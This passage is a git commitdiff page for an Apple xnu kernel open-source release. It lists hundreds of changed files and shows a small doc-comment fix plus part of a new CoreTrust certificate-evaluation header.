]> git.saurik.com Git - apple/xnu.git/commitdiff
xnu-7195.101.1.tar.gz master macos-113 v7195.101.1
authorApple <opensource@apple.com>
Tue, 27 Apr 2021 01:04:15 +0000 (01:04 +0000)
committerApple <opensource@apple.com>
Tue, 27 Apr 2021 01:04:15 +0000 (01:04 +0000)
714 files changed:
EXTERNAL_HEADERS/corecrypto/cckprng.h
EXTERNAL_HEADERS/coretrust/CTEvaluate.h [new file with mode: 0644]
EXTERNAL_HEADERS/stdint.h
Makefile
SETUP/setsegname/setsegname.c
bsd/arm/vmparam.h
bsd/conf/files
bsd/crypto/entropy/Makefile
bsd/crypto/entropy/entropy_sysctl.c
bsd/crypto/entropy/entropy_sysctl.h [deleted file]
bsd/dev/arm/dtrace_isa.c
bsd/dev/arm/munge.c
bsd/dev/arm/stubs.c
bsd/dev/arm64/dtrace_isa.c
bsd/dev/dtrace/dtrace.c
bsd/dev/dtrace/dtrace_glue.c
bsd/dev/dtrace/dtrace_subr.c
bsd/dev/dtrace/fasttrap.c
bsd/dev/dtrace/fbt.c
bsd/dev/dtrace/fbt_blacklist.c
bsd/dev/dtrace/lockstat.c
bsd/dev/dtrace/sdt_subr.c
bsd/dev/dtrace/systrace.c
bsd/dev/i386/dtrace_isa.c
bsd/dev/i386/sysctl.c
bsd/dev/mem.c
bsd/dev/monotonic.c
bsd/dev/munge.c
bsd/kern/bsd_init.c
bsd/kern/bsd_stubs.c
bsd/kern/counter_test.c [new file with mode: 0644]
bsd/kern/decmpfs.c
bsd/kern/imageboot.c
bsd/kern/kdebug.c
bsd/kern/kern_acct.c
bsd/kern/kern_authorization.c
bsd/kern/kern_control.c
bsd/kern/kern_core.c
bsd/kern/kern_credential.c
bsd/kern/kern_cs.c
bsd/kern/kern_descrip.c
bsd/kern/kern_event.c
bsd/kern/kern_exec.c
bsd/kern/kern_exit.c
bsd/kern/kern_fork.c
bsd/kern/kern_guarded.c
bsd/kern/kern_kpc.c
bsd/kern/kern_ktrace.c
bsd/kern/kern_lockf.c
bsd/kern/kern_memorystatus.c
bsd/kern/kern_memorystatus_freeze.c
bsd/kern/kern_mib.c
bsd/kern/kern_mman.c
bsd/kern/kern_newsysctl.c
bsd/kern/kern_ntptime.c
bsd/kern/kern_overrides.c
bsd/kern/kern_persona.c
bsd/kern/kern_proc.c
bsd/kern/kern_prot.c
bsd/kern/kern_resource.c
bsd/kern/kern_shutdown.c
bsd/kern/kern_sig.c
bsd/kern/kern_sysctl.c
bsd/kern/kern_time.c
bsd/kern/kern_xxx.c
bsd/kern/kpi_mbuf.c
bsd/kern/kpi_socket.c
bsd/kern/kpi_socketfilter.c
bsd/kern/mach_loader.c
bsd/kern/mcache.c
bsd/kern/policy_check.c
bsd/kern/posix_sem.c
bsd/kern/posix_shm.c
bsd/kern/proc_uuid_policy.c
bsd/kern/subr_eventhandler.c
bsd/kern/subr_sbuf.c
bsd/kern/sys_generic.c
bsd/kern/sys_persona.c
bsd/kern/sys_reason.c
bsd/kern/syscalls.master
bsd/kern/sysv_msg.c
bsd/kern/sysv_sem.c
bsd/kern/sysv_shm.c
bsd/kern/trace_codes
bsd/kern/tty.c
bsd/kern/tty_ptmx.c
bsd/kern/ubc_subr.c
bsd/kern/uipc_domain.c
bsd/kern/uipc_mbuf.c
bsd/kern/uipc_socket.c
bsd/kern/uipc_syscalls.c
bsd/kern/uipc_usrreq.c
bsd/kern/vsock_domain.c
bsd/man/man2/clonefile.2
bsd/man/man2/mount.2
bsd/miscfs/bindfs/bind_subr.c
bsd/miscfs/bindfs/bind_vnops.c
bsd/miscfs/bindfs/bindfs.h
bsd/miscfs/devfs/devfs_fdesc_support.c
bsd/miscfs/devfs/devfs_tree.c
bsd/miscfs/devfs/devfs_vfsops.c
bsd/miscfs/mockfs/mockfs.h
bsd/miscfs/mockfs/mockfs_vfsops.c
bsd/miscfs/nullfs/null_subr.c
bsd/miscfs/nullfs/null_vfsops.c
bsd/miscfs/nullfs/null_vnops.c
bsd/miscfs/nullfs/nullfs.h
bsd/miscfs/routefs/routefs_ops.c
bsd/miscfs/specfs/spec_vnops.c
bsd/net/classq/classq.h
bsd/net/classq/classq_fq_codel.c
bsd/net/classq/classq_fq_codel.h
bsd/net/classq/classq_subr.c
bsd/net/classq/if_classq.h
bsd/net/content_filter.c
bsd/net/dlil.c
bsd/net/if_vlan.c
bsd/net/kext_net.h
bsd/net/necp.c
bsd/net/necp.h
bsd/net/necp_client.c
bsd/net/pktsched/pktsched_fq_codel.c
bsd/net/pktsched/pktsched_fq_codel.h
bsd/net/radix.c
bsd/net/route.c
bsd/net/route.h
bsd/net/skywalk_stubs.c
bsd/netinet/cpu_in_cksum_gen.c
bsd/netinet/flow_divert.c
bsd/netinet/icmp6.h
bsd/netinet/icmp_var.h
bsd/netinet/in_pcb.c
bsd/netinet/in_pcb.h
bsd/netinet/in_systm.h
bsd/netinet/ip_icmp.c
bsd/netinet/mptcp.c
bsd/netinet/mptcp_opt.c
bsd/netinet/mptcp_subr.c
bsd/netinet/mptcp_usrreq.c
bsd/netinet/mptcp_var.h
bsd/netinet/raw_ip.c
bsd/netinet/tcp.h
bsd/netinet/tcp_input.c
bsd/netinet/tcp_output.c
bsd/netinet/tcp_subr.c
bsd/netinet/tcp_timer.c
bsd/netinet/tcp_usrreq.c
bsd/netinet/tcp_var.h
bsd/netinet/udp_usrreq.c
bsd/netinet6/icmp6.c
bsd/netinet6/in6_proto.c
bsd/nfs/gss/gss_krb5_mech.c
bsd/nfs/gss/gss_krb5_mech.h
bsd/nfs/nfs.h
bsd/nfs/nfs4_subs.c
bsd/nfs/nfs4_vnops.c
bsd/nfs/nfs_bio.c
bsd/nfs/nfs_gss.c
bsd/nfs/nfs_gss.h
bsd/nfs/nfs_lock.c
bsd/nfs/nfs_lock.h
bsd/nfs/nfs_node.c
bsd/nfs/nfs_serv.c
bsd/nfs/nfs_socket.c
bsd/nfs/nfs_srvcache.c
bsd/nfs/nfs_subs.c
bsd/nfs/nfs_syscalls.c
bsd/nfs/nfs_upcall.c
bsd/nfs/nfs_vfsops.c
bsd/nfs/nfs_vnops.c
bsd/nfs/nfsmount.h
bsd/nfs/nfsnode.h
bsd/nfs/nfsrvcache.h
bsd/pthread/pthread_shims.c
bsd/pthread/pthread_workqueue.c
bsd/security/audit/audit_arg.c
bsd/security/audit/audit_mac.c
bsd/security/audit/audit_session.c
bsd/sys/buf.h
bsd/sys/buf_internal.h
bsd/sys/commpage.h
bsd/sys/conf.h
bsd/sys/dtrace_impl.h
bsd/sys/event.h
bsd/sys/eventhandler.h
bsd/sys/imageboot.h
bsd/sys/kasl.h
bsd/sys/kauth.h
bsd/sys/kdebug.h
bsd/sys/kern_memorystatus.h
bsd/sys/kern_memorystatus_freeze.h
bsd/sys/lockf.h
bsd/sys/malloc.h
bsd/sys/mbuf.h
bsd/sys/mcache.h
bsd/sys/mman.h
bsd/sys/monotonic.h
bsd/sys/mount.h
bsd/sys/mount_internal.h
bsd/sys/munge.h
bsd/sys/proc.h
bsd/sys/proc_internal.h
bsd/sys/pthread_shims.h
bsd/sys/quota.h
bsd/sys/resource.h
bsd/sys/sbuf.h
bsd/sys/select.h
bsd/sys/semaphore.h
bsd/sys/socketvar.h
bsd/sys/sysctl.h
bsd/sys/systm.h
bsd/sys/tty.h
bsd/sys/ubc_internal.h
bsd/sys/ucred.h
bsd/sys/unpcb.h
bsd/sys/user.h
bsd/sys/vnode.h
bsd/sys/vnode_internal.h
bsd/sys/vsock_domain.h
bsd/sys/work_interval.h
bsd/sys_private/kdebug_private.h
bsd/tests/bsd_tests.c
bsd/vfs/kpi_vfs.c
bsd/vfs/vfs_bio.c
bsd/vfs/vfs_cache.c
bsd/vfs/vfs_fsevents.c
bsd/vfs/vfs_fslog.c
bsd/vfs/vfs_init.c
bsd/vfs/vfs_io_compression_stats.c [new file with mode: 0644]
bsd/vfs/vfs_io_compression_stats.h [new file with mode: 0644]
bsd/vfs/vfs_lookup.c
bsd/vfs/vfs_quota.c
bsd/vfs/vfs_subr.c
bsd/vfs/vfs_syscalls.c
bsd/vfs/vfs_xattr.c
bsd/vm/vm_unix.c
bsd/vm/vnode_pager.c
config/BSDKernel.exports
config/IOKit.exports
config/Libkern.exports
config/MASTER
config/MASTER.arm
config/MASTER.arm64
config/MASTER.arm64.BridgeOS
config/MASTER.arm64.MacOSX
config/MASTER.arm64.bcm2837
config/MASTER.arm64.iPhoneOS
config/MASTER.x86_64
config/MasterVersion
config/Private.arm.exports
config/Private.arm64.exports
config/Private.exports
config/Private.x86_64.exports
config/Unsupported.arm64.MacOSX.exports
config/Unsupported.exports
config/Unsupported.x86_64.MacOSX.exports
config/generate_symbolset_plist.sh
doc/allocators.md
doc/startup.md
iokit/DriverKit/IOService.iig
iokit/DriverKit/IOUserClient.iig
iokit/IOKit/IOKitKeysPrivate.h
iokit/IOKit/IOKitServer.h
iokit/IOKit/IOMemoryDescriptor.h
iokit/IOKit/IONVRAM.h
iokit/IOKit/IOPMGR.h
iokit/IOKit/IOPlatformExpert.h
iokit/IOKit/IOStatisticsPrivate.h
iokit/IOKit/IOUserServer.h
iokit/IOKit/pwr_mgt/IOPM.h
iokit/IOKit/pwr_mgt/IOPMPrivate.h
iokit/Kernel/IOBufferMemoryDescriptor.cpp
iokit/Kernel/IOCatalogue.cpp
iokit/Kernel/IODMACommand.cpp
iokit/Kernel/IOHibernateIO.cpp
iokit/Kernel/IOKitDebug.cpp
iokit/Kernel/IOKitKernelInternal.h
iokit/Kernel/IOLib.cpp
iokit/Kernel/IOMemoryDescriptor.cpp
iokit/Kernel/IONVRAM.cpp
iokit/Kernel/IOPMGR.cpp
iokit/Kernel/IOPMrootDomain.cpp
iokit/Kernel/IOPlatformExpert.cpp
iokit/Kernel/IOService.cpp
iokit/Kernel/IOStartIOKit.cpp
iokit/Kernel/IOStatistics.cpp
iokit/Kernel/IOUserClient.cpp
iokit/Kernel/IOUserServer.cpp
iokit/Kernel/arm/AppleARMSMP.cpp
iokit/Kernel/i386/IOKeyStoreHelper.cpp
iokit/Tests/Tests.cpp
iokit/bsddev/IOKitBSDInit.cpp
libkdd/kcdata.h
libkdd/kcdtypes.c
libkern/c++/OSKext.cpp
libkern/c++/OSRuntime.cpp
libkern/conf/files
libkern/coretrust/coretrust.c [new file with mode: 0644]
libkern/firehose/chunk_private.h
libkern/firehose/firehose_types_private.h
libkern/firehose/tracepoint_private.h
libkern/libkern/Makefile
libkern/libkern/OSKextLibPrivate.h
libkern/libkern/c++/OSKext.h
libkern/libkern/c++/OSString.h
libkern/libkern/coretrust/Makefile [new file with mode: 0644]
libkern/libkern/coretrust/coretrust.h [new file with mode: 0644]
libkern/libkern/ptrauth_utils.h
libkern/os/atomic_private_impl.h
libkern/os/hash.h
libkern/os/log.c
libkern/os/log_encode.c [new file with mode: 0644]
libkern/os/log_encode.h
libkern/os/log_encode_types.h
libkern/os/log_mem.c [new file with mode: 0644]
libkern/os/log_mem.h [new file with mode: 0644]
libkern/ptrauth_utils.c
libsa/conf/Makefile.template
libsyscall/Libsyscall.xcconfig
libsyscall/Libsyscall.xcodeproj/project.pbxproj
libsyscall/mach/.gitignore [deleted file]
libsyscall/mach/host.c
libsyscall/mach/mach/mach_init.h
libsyscall/mach/mach/port_descriptions.h
libsyscall/mach/mach_init.c
libsyscall/mach/mach_port.c
libsyscall/mach/mach_vm.c
libsyscall/mach/port_descriptions.c
libsyscall/mach/task.c [new file with mode: 0644]
libsyscall/wrappers/__commpage_gettimeofday.c
libsyscall/wrappers/_libkernel_init.c
libsyscall/wrappers/getiopolicy_np.c
libsyscall/wrappers/kdebug_trace.c
libsyscall/wrappers/mach_approximate_time.c
libsyscall/wrappers/mach_boottime.c
libsyscall/wrappers/mach_bridge_remote_time.c
libsyscall/xcodescripts/mach_install_mig.sh
makedefs/MakeInc.cmd
makedefs/MakeInc.def
osfmk/UserNotification/KUNCUserNotifications.c
osfmk/arm/arm_init.c
osfmk/arm/arm_vm_init.c
osfmk/arm/bsd_arm.c
osfmk/arm/counter.c [new file with mode: 0644]
osfmk/arm/cpu_capabilities.h
osfmk/arm/cpu_common.c
osfmk/arm/cpu_data_internal.h
osfmk/arm/locks_arm.c
osfmk/arm/machine_routines.c
osfmk/arm/machine_routines.h
osfmk/arm/machine_routines_apple.c
osfmk/arm/machine_routines_common.c
osfmk/arm/model_dep.c
osfmk/arm/pmap.c
osfmk/arm/pmap.h
osfmk/arm/proc_reg.h
osfmk/arm/rtclock.c
osfmk/arm/task.h
osfmk/arm64/Makefile
osfmk/arm64/amcc_rorgn.c
osfmk/arm64/arm_vm_init.c
osfmk/arm64/bsd_arm64.c
osfmk/arm64/caches_asm.s
osfmk/arm64/copyio.c
osfmk/arm64/cswitch.s
osfmk/arm64/exception_asm.h
osfmk/arm64/hibernate_restore.c
osfmk/arm64/kpc.c
osfmk/arm64/locore.s
osfmk/arm64/machine_routines.c
osfmk/arm64/machine_routines_asm.s
osfmk/arm64/monotonic.h
osfmk/arm64/monotonic_arm64.c
osfmk/arm64/pgtrace.c
osfmk/arm64/platform_tests.c
osfmk/arm64/platform_tests_asm.s
osfmk/arm64/proc_reg.h
osfmk/arm64/sleh.c
osfmk/arm64/smccc_asm.h [new file with mode: 0644]
osfmk/arm64/start.s
osfmk/arm64/tunables/tunables.s [deleted file]
osfmk/arm64/tunables/tunables_h10.s [deleted file]
osfmk/arm64/tunables/tunables_h11.s [deleted file]
osfmk/arm64/tunables/tunables_h12.s [deleted file]
osfmk/arm64/tunables/tunables_h13.s [deleted file]
osfmk/arm64/tunables/tunables_h7.s [deleted file]
osfmk/arm64/tunables/tunables_h8.s [deleted file]
osfmk/arm64/tunables/tunables_h9.s [deleted file]
osfmk/conf/Makefile.template
osfmk/conf/files
osfmk/conf/files.arm
osfmk/conf/files.arm64
osfmk/conf/files.x86_64
osfmk/console/serial_console.c
osfmk/console/serial_general.c
osfmk/corpses/corpse.c
osfmk/device/iokit_rpc.c
osfmk/i386/Makefile
osfmk/i386/acpi.c
osfmk/i386/bsd_i386.c
osfmk/i386/bsd_i386_native.c
osfmk/i386/cpu_capabilities.h
osfmk/i386/cpuid.c
osfmk/i386/cpuid.h
osfmk/i386/i386_init.c
osfmk/i386/locks_i386.c
osfmk/i386/machine_routines.c
osfmk/i386/pcb.c
osfmk/i386/pcb_native.c
osfmk/i386/phys.c
osfmk/i386/pmap.h
osfmk/i386/ucode.c
osfmk/i386/vmx/vmx_cpu.c
osfmk/i386/vmx/vmx_cpu.h
osfmk/i386/x86_hypercall.c [new file with mode: 0644]
osfmk/i386/x86_hypercall.h [new file with mode: 0644]
osfmk/ipc/ipc_entry.c
osfmk/ipc/ipc_entry.h
osfmk/ipc/ipc_eventlink.c
osfmk/ipc/ipc_importance.c
osfmk/ipc/ipc_init.c
osfmk/ipc/ipc_kmsg.c
osfmk/ipc/ipc_kmsg.h
osfmk/ipc/ipc_mqueue.c
osfmk/ipc/ipc_mqueue.h
osfmk/ipc/ipc_object.c
osfmk/ipc/ipc_object.h
osfmk/ipc/ipc_port.c
osfmk/ipc/ipc_port.h
osfmk/ipc/ipc_pset.c
osfmk/ipc/ipc_right.c
osfmk/ipc/ipc_right.h
osfmk/ipc/ipc_types.h
osfmk/ipc/ipc_voucher.c
osfmk/ipc/mach_debug.c
osfmk/ipc/mach_kernelrpc.c
osfmk/ipc/mach_msg.c
osfmk/ipc/mach_port.c
osfmk/ipc/port.h
osfmk/kdp/kdp_dyld.h
osfmk/kdp/ml/arm/kdp_machdep.c
osfmk/kern/Makefile
osfmk/kern/ast.c
osfmk/kern/audit_sessionport.c
osfmk/kern/bits.h
osfmk/kern/bsd_kern.c
osfmk/kern/coalition.c
osfmk/kern/counter.h [new file with mode: 0644]
osfmk/kern/counter_common.c [new file with mode: 0644]
osfmk/kern/counters.c [deleted file]
osfmk/kern/counters.h [deleted file]
osfmk/kern/cpu_quiesce.c
osfmk/kern/debug.c
osfmk/kern/debug.h
osfmk/kern/exception.c
osfmk/kern/gzalloc.c
osfmk/kern/host.c
osfmk/kern/host_statistics.h
osfmk/kern/hv_io_notifier.c [new file with mode: 0644]
osfmk/kern/hv_io_notifier.h [new file with mode: 0644]
osfmk/kern/hv_support_kext.c
osfmk/kern/hv_support_kext.h
osfmk/kern/hvg_hypercall.h [new file with mode: 0644]
osfmk/kern/ipc_host.c
osfmk/kern/ipc_kobject.c
osfmk/kern/ipc_kobject.h
osfmk/kern/ipc_mig.c
osfmk/kern/ipc_mig.h
osfmk/kern/ipc_misc.c
osfmk/kern/ipc_sync.c
osfmk/kern/ipc_tt.c
osfmk/kern/ipc_tt.h
osfmk/kern/kalloc.c
osfmk/kern/kcdata.h
osfmk/kern/kern_stackshot.c
osfmk/kern/kext_alloc.c
osfmk/kern/kext_alloc.h
osfmk/kern/lock_stat.h
osfmk/kern/locks.c
osfmk/kern/machine.c
osfmk/kern/policy_internal.h
osfmk/kern/printf.c
osfmk/kern/processor.c
osfmk/kern/processor.h
osfmk/kern/sched_amp.c
osfmk/kern/sched_average.c
osfmk/kern/sched_prim.c
osfmk/kern/simple_lock.h
osfmk/kern/startup.c
osfmk/kern/startup.h
osfmk/kern/suid_cred.c
osfmk/kern/sync_sema.c
osfmk/kern/syscall_subr.c
osfmk/kern/syscall_sw.c
osfmk/kern/syscall_sw.h
osfmk/kern/task.c
osfmk/kern/task.h
osfmk/kern/task_ident.c [new file with mode: 0644]
osfmk/kern/task_ident.h [new file with mode: 0644]
osfmk/kern/task_policy.c
osfmk/kern/task_swap.c [deleted file]
osfmk/kern/task_swap.h [deleted file]
osfmk/kern/telemetry.c
osfmk/kern/thread.c
osfmk/kern/thread.h
osfmk/kern/thread_act.c
osfmk/kern/thread_call.c
osfmk/kern/thread_call.h
osfmk/kern/thread_group.c
osfmk/kern/thread_group.h
osfmk/kern/turnstile.c
osfmk/kern/ux_handler.c
osfmk/kern/zalloc.c
osfmk/kern/zalloc.h
osfmk/kern/zalloc_internal.h
osfmk/kern/zcache.c [deleted file]
osfmk/kern/zcache_internal.h [deleted file]
osfmk/mach/Makefile
osfmk/mach/arm/traps.h
osfmk/mach/exception_types.h
osfmk/mach/host_special_ports.h
osfmk/mach/iocompressionstats_notification.defs [new file with mode: 0644]
osfmk/mach/kern_return.h
osfmk/mach/mach_traps.h
osfmk/mach/mach_types.defs
osfmk/mach/mach_types.h
osfmk/mach/mach_vm.defs
osfmk/mach/mach_voucher.defs
osfmk/mach/memory_object_types.h
osfmk/mach/port.h
osfmk/mach/syscall_sw.h
osfmk/mach/task.defs
osfmk/mach/task_access.defs
osfmk/mach/task_special_ports.h
osfmk/mach/thread_act.defs
osfmk/mach/thread_special_ports.h
osfmk/mach/vm_map.defs
osfmk/mach/vm_param.h
osfmk/mach/vm_statistics.h
osfmk/mach/vm_types.h
osfmk/mach_debug/ipc_info.h
osfmk/machine/machine_routines.h
osfmk/man/task_get_special_port.html
osfmk/man/task_set_special_port.html
osfmk/man/thread_get_special_port.html
osfmk/man/thread_set_special_port.html
osfmk/prng/entropy.c
osfmk/tests/bitmap_test.c
osfmk/tests/kernel_tests.c
osfmk/tests/ptrauth_data_tests.c
osfmk/vm/Makefile
osfmk/vm/bsd_vm.c
osfmk/vm/device_vm.c
osfmk/vm/lz4.h
osfmk/vm/memory_object.c
osfmk/vm/memory_object.h
osfmk/vm/pmap.h
osfmk/vm/vm_apple_protect.c
osfmk/vm/vm_compressor.c
osfmk/vm/vm_compressor.h
osfmk/vm/vm_compressor_backing_store.c
osfmk/vm/vm_compressor_backing_store.h
osfmk/vm/vm_compressor_pager.c
osfmk/vm/vm_fault.c
osfmk/vm/vm_fourk_pager.c
osfmk/vm/vm_init.c
osfmk/vm/vm_kern.c
osfmk/vm/vm_kern.h
osfmk/vm/vm_map.c
osfmk/vm/vm_map.h
osfmk/vm/vm_object.c
osfmk/vm/vm_object.h
osfmk/vm/vm_page.h
osfmk/vm/vm_pageout.c
osfmk/vm/vm_pageout.h
osfmk/vm/vm_phantom_cache.c
osfmk/vm/vm_protos.h
osfmk/vm/vm_purgeable.c
osfmk/vm/vm_resident.c
osfmk/vm/vm_shared_region.c
osfmk/vm/vm_shared_region.h
osfmk/vm/vm_shared_region_pager.c
osfmk/vm/vm_swapfile_pager.c
osfmk/vm/vm_tests.c
osfmk/vm/vm_user.c
osfmk/x86_64/copyio.c
osfmk/x86_64/counter.c [new file with mode: 0644]
osfmk/x86_64/pmap.c
pexpert/arm/pe_identify_machine.c
pexpert/arm/pe_init.c
pexpert/arm/pe_serial.c
pexpert/pexpert/arm/boot.h
pexpert/pexpert/arm64/apple_arm64_regs.h
pexpert/pexpert/arm64/board_config.h
pexpert/pexpert/arm64/boot.h
pexpert/pexpert/i386/boot.h
san/Kasan_kasan.exports
san/kasan-blacklist
san/kasan-fakestack.c
san/ksancov.c
san/memintrinsics.h
san/ubsan.c
san/ubsan.h
san/ubsan_log.c
security/mac_base.c
security/mac_framework.h
security/mac_iokit.c
security/mac_mach.c
security/mac_mach_internal.h
security/mac_policy.h
security/mac_process.c
tests/Makefile
tests/atm_diagnostic_flag_entitled.c
tests/benchmark/helpers.c [new file with mode: 0644]
tests/benchmark/helpers.h [new file with mode: 0644]
tests/counter/benchmark.c [new file with mode: 0644]
tests/counter/benchmark.lua [new file with mode: 0644]
tests/counter/common.c [new file with mode: 0644]
tests/counter/common.h [new file with mode: 0644]
tests/counter/counter.c [new file with mode: 0644]
tests/cpucount.c
tests/data_protection.c
tests/decompression_failure.c
tests/dev_zero.c [new file with mode: 0644]
tests/driverkit/Makefile
tests/driverkit/test_intentionally_crashing_driver_56101852/Info.plist [deleted file]
tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.cpp [deleted file]
tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.entitlements [deleted file]
tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.iig [deleted file]
tests/drop_priv.c
tests/drop_priv.h [new file with mode: 0644]
tests/exc_helpers.c
tests/exc_helpers.h
tests/exception_ports_info.c [new file with mode: 0644]
tests/exception_tests.c [new file with mode: 0644]
tests/exception_tests.entitlements [new file with mode: 0644]
tests/exec-race-58566604.c [new file with mode: 0644]
tests/extract_right_soft_fail.c [new file with mode: 0644]
tests/fd_send.c [new file with mode: 0644]
tests/fp_exception.c
tests/hv_private.entitlements [deleted file]
tests/hv_public.entitlements [deleted file]
tests/hvtest_x86.m
tests/hvtest_x86_asm.s
tests/hvtest_x86_guest.h
tests/imm_pinned_control_port.c [new file with mode: 0644]
tests/imm_pinned_control_port_crasher.c [new file with mode: 0644]
tests/inspect_port.c [deleted file]
tests/ipc_mach_port.c [new file with mode: 0644]
tests/kdebug.c
tests/kernel_inspection.c [new file with mode: 0644]
tests/kqueue_file_tests.c
tests/launchd_plists/com.apple.xnu.test.mach_port.plist [new file with mode: 0644]
tests/lockf_uaf_poc/README [new file with mode: 0644]
tests/lockf_uaf_poc/lockf_uaf_poc_70587638.c [new file with mode: 0644]
tests/memorystatus_freeze_test.c
tests/memorystatus_is_assertion.c
tests/memorystatus_vm_map_fork.c
tests/perf_vmfault.c
tests/port_descriptions.c
tests/preoslog.c
tests/quiesce_counter.c
tests/read_inspect.c [new file with mode: 0644]
tests/recvmsg_x_test.c [new file with mode: 0644]
tests/restrict_jit.c [new file with mode: 0644]
tests/restrict_jit.entitlements [new file with mode: 0644]
tests/scm_rights_leak.c [new file with mode: 0644]
tests/socket_raw_uint8_max.c [new file with mode: 0644]
tests/stackshot_tests.m
tests/sysctl_get_owned_vmobjects.c
tests/sysctl_hw.c
tests/task_for_pid_entitlement.plist
tests/task_ident_test.c [new file with mode: 0644]
tests/task_info.c
tests/task_inspect.c [deleted file]
tests/task_inspect.entitlements [deleted file]
tests/task_is_self.c [new file with mode: 0644]
tests/test_dext_launch_56101852.c [deleted file]
tests/test_dext_launch_56101852.entitlements [deleted file]
tests/test_utils.c [new file with mode: 0644]
tests/test_utils.h [new file with mode: 0644]
tests/text_corruption.c [new file with mode: 0644]
tests/text_corruption_helper.c [new file with mode: 0644]
tests/thread_call_race_71455282.c [new file with mode: 0644]
tests/trial_experiments.c [new file with mode: 0644]
tests/trial_experiments.entitlements [new file with mode: 0644]
tests/vm/fault_throughput.c
tests/vm/page_size_globals.c [new file with mode: 0644]
tests/vm/perf_helpers.c [deleted file]
tests/vm/perf_helpers.h [deleted file]
tests/vm/perf_madvise.c
tests/vm/retired_pages.c [new file with mode: 0644]
tests/vm_test_code_signing_helper.c
tests/vm_test_mach_map.c
tests/xnu_quick_test.entitlements [deleted file]
tests/xnu_quick_test_entitled.c [deleted file]
tests/zalloc_buddy.c [new file with mode: 0644]
tools/lldbmacros/Makefile
tools/lldbmacros/core/kernelcore.py
tools/lldbmacros/core/syntax_checker.py
tools/lldbmacros/counter.py [new file with mode: 0755]
tools/lldbmacros/ipc.py
tools/lldbmacros/kasan.py
tools/lldbmacros/kcdata.py
tools/lldbmacros/ktrace.py
tools/lldbmacros/mbufs.py
tools/lldbmacros/memory.py
tools/lldbmacros/process.py
tools/lldbmacros/utils.py
tools/lldbmacros/xnu.py
tools/tests/Makefile
tools/tests/kernpost_test_report/Makefile [new file with mode: 0644]
tools/tests/kernpost_test_report/kernpost_test_report.m [new file with mode: 0644]
tools/tests/zero-to-n/zero-to-n.c

index 79fe22fd3113fd687a5c1b3b013224aed0ef989c..d50b1d060a3d9692b6de868439a143b886e02504 100644 (file)
@@ -310,7 +310,6 @@ struct cckprng_funcs {
   @param seed_nbytes Length of the seed in bytes
   @param seed Pointer to a high-entropy seed
   @param nonce_nbytes Length of the nonce in bytes
-  @param seed Pointer to a single-use nonce
 
   @discussion @p max_ngens should be set based on an upper bound of CPUs available on the device. The entropy buffer should be managed outside the PRNG and updated continuously (e.g. by an interrupt handler). The count of samples in the entropy buffer needn't be better than a rough estimate.
 */
diff --git a/EXTERNAL_HEADERS/coretrust/CTEvaluate.h b/EXTERNAL_HEADERS/coretrust/CTEvaluate.h
new file mode 100644 (file)
index 0000000..3be1d92
--- /dev/null
@@ -0,0 +1,215 @@
+//
+//  CoreTrust.h
+//  CoreTrust
+//
+//  Copyright Â© 2017-2020 Apple Inc. All rights reserved.
+//
+
+#ifndef _CORETRUST_EVALUATE_H_
+#define _CORETRUST_EVALUATE_H_
+
+#include <stdint.h>
+#include <stdbool.h>
+
+__BEGIN_DECLS
+
+typedef struct x509_octet_string {
+    const uint8_t *data;
+    size_t length;
+} CTAsn1Item;
+
+int CTParseCertificateSet(const uint8_t *der, const uint8_t *der_end,       // Input: binary representation of concatenated DER-encoded certs
+                          CTAsn1Item *certStorage, size_t certStorageLen,   // Output: An array of certStorageLen CTAsn1Items that will be populated with the
+                                                                            //    CTAsn1Item for each parsed cert (in the same order as input)
+                          size_t *numParsedCerts);                          // Output: number of successfully parsed certs
+
+int CTEvaluateSavageCerts(const uint8_t *certsData, size_t certsLen,
+                          const uint8_t *rootKeyData, size_t rootKeyLen,
+                          const uint8_t **leafKeyData, size_t *leafKeyLen,
+                          bool *isProdCert);
+
+int CTEvaluateSavageCertsWithUID(const uint8_t *certsData, size_t certsLen,
+                                 const uint8_t *rootKeyData, size_t rootKeyLen,
+                                 const uint8_t **leafKeyData, size_t *leafKeyLen, // Output: points to the leaf key data in the input certsData
+                                 uint8_t *UIDData, size_t UIDLen,                 // Output: a pre-allocated buffer of UIDLen
+                                 bool *isProdCert);
+
+int CTEvaluateYonkersCerts(const uint8_t *certsData, size_t certsLen,
+                           const uint8_t *rootKeyData, size_t rootKeyLen,
+                           const uint8_t **leafKeyData, size_t *leafKeyLen, // Output: points to the leaf key data in the input certsData
+                           uint8_t *UIDData, size_t UIDLen,                 // Output: a pre-allocated buffer of UIDLen
+                           bool *isProdCert);
+
+int CTEvaluateAcrt(const uint8_t *certsData, size_t certsLen,         // Input: binary representation of at most 3 concatenated certs
+                                                                      //         with leaf first (root may be omitted)
+                   const uint8_t **leafKeyData, size_t *leafKeyLen);  // Output: points to the leaf key data in the input certsData
+
+int CTEvaluateUcrt(const uint8_t *certsData, size_t certsLen,         // Input: binary representation of exactly 3 concatenated
+                                                                      //        DER-encoded certs, with leaf first
+                   const uint8_t **leafKeyData, size_t *leafKeyLen);  // Output: points to the leaf key data in the input certsData)
+
+int CTEvaluateUcrtTestRoot(const uint8_t *certsData, size_t certsLen,         // Input: binary representation of exactly 3 concatenated
+                                                                              //        DER-encoded certs, with leaf first
+                           const uint8_t *rootKeyData, size_t rootKeyLen,     // Input: Root public key, if not specified production root will be used
+                           const uint8_t **leafKeyData, size_t *leafKeyLen);  // Output: points to the leaf key data in the input certsData)
+
+int CTEvaluateBAASystem(const uint8_t *certsData, size_t certsLen,         // Input: binary representation of exactly 3 concatenated
+                                                                           //        DER-encoded certs, with leaf first
+                        const uint8_t **leafKeyData, size_t *leafKeyLen);  // Output: points to the leaf key data in the input certsData
+
+typedef struct baa_identity {
+    uint32_t chipId;
+    uint64_t ecid;
+    bool productionStatus;
+    bool securityMode;
+    uint8_t securityDomain;
+    CTAsn1Item img4;
+} CTBAAIdentity;
+
+int CTEvaluateBAASystemWithId(const uint8_t *certsData, size_t certsLen,        // Input: binary representation of exactly 3 concatenated
+                                                                                //        DER-encoded certs, with leaf first
+                              const uint8_t **leafKeyData, size_t *leafKeyLen,  // Output: points to the leaf key data in the input certsData
+                              CTBAAIdentity *identity);                         // Output from identity field in leaf certificate
+
+int CTEvaluateBAASystemTestRoot(const uint8_t *certsData, size_t certsLen,      // Input: binary representation of exactly 3 concatenated
+                                                                                //        DER-encoded certs, with leaf first
